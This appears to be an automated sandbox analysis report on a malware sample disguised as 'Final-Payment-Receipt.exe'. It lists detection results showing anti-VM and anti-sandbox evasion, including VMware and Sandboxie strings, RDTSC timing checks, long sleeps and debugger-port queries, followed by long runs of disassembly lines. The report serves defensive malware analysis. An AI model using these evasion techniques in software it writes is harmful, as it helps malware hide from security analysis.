          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Final-Payment-Receipt.exe PID: 1692, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002EB98E4 second address: 0000000002EB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002EB9B5E second address: 0000000002EB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 5772Thread sleep time: -52501s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 6088Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4568Thread sleep count: 39 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4568Thread sleep time: -78000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5456Thread sleep time: -75000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.246034971.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.236884381.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000002.00000002.494413702.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.241386939.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F4
          Source: explorer.exe, 00000002.00000002.490839971.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000002.499236558.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AF_UNIXa0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.499263196.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]1_2_013E513A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]1_2_013E513A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov ecx, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]1_2_013BB171
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]1_2_013BB171
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC962 mov eax, dword ptr fs:[00000030h]1_2_013BC962
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]1_2_013DB944
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]1_2_013DB944
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]1_2_013E61A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]1_2_013E61A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014441E8 mov eax, dword ptr fs:[00000030h]1_2_014441E8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2990 mov eax, dword ptr fs:[00000030h]1_2_013E2990
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4190 mov eax, dword ptr fs:[00000030h]1_2_013E4190
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA185 mov eax, dword ptr fs:[00000030h]1_2_013EA185
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC182 mov eax, dword ptr fs:[00000030h]1_2_013DC182
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014369A6 mov eax, dword ptr fs:[00000030h]1_2_014369A6
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472073 mov eax, dword ptr fs:[00000030h]1_2_01472073
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01481074 mov eax, dword ptr fs:[00000030h]1_2_01481074
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]1_2_01437016
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]1_2_01437016
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]1_2_01437016
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]1_2_01484015
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]1_2_01484015
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]1_2_013D0050
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]1_2_013D0050
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov ecx, dword ptr fs:[00000030h]1_2_013EF0BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]1_2_013EF0BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]1_2_013EF0BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F90AF mov eax, dword ptr fs:[00000030h]1_2_013F90AF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9080 mov eax, dword ptr fs:[00000030h]1_2_013B9080
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]1_2_01433884
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]1_2_01433884
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B58EC mov eax, dword ptr fs:[00000030h]1_2_013B58EC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]1_2_013DB8E4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]1_2_013DB8E4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]1_2_013B40E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]1_2_013B40E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]1_2_013B40E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488B58 mov eax, dword ptr fs:[00000030h]1_2_01488B58
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]1_2_013E3B7A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]1_2_013E3B7A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BDB60 mov ecx, dword ptr fs:[00000030h]1_2_013BDB60
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147131B mov eax, dword ptr fs:[00000030h]1_2_0147131B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BF358 mov eax, dword ptr fs:[00000030h]1_2_013BF358
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BDB40 mov eax, dword ptr fs:[00000030h]1_2_013BDB40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]1_2_014353CA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]1_2_014353CA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]1_2_013E4BAD
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]1_2_013E4BAD
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]1_2_013E4BAD
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]1_2_014623E3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]1_2_014623E3
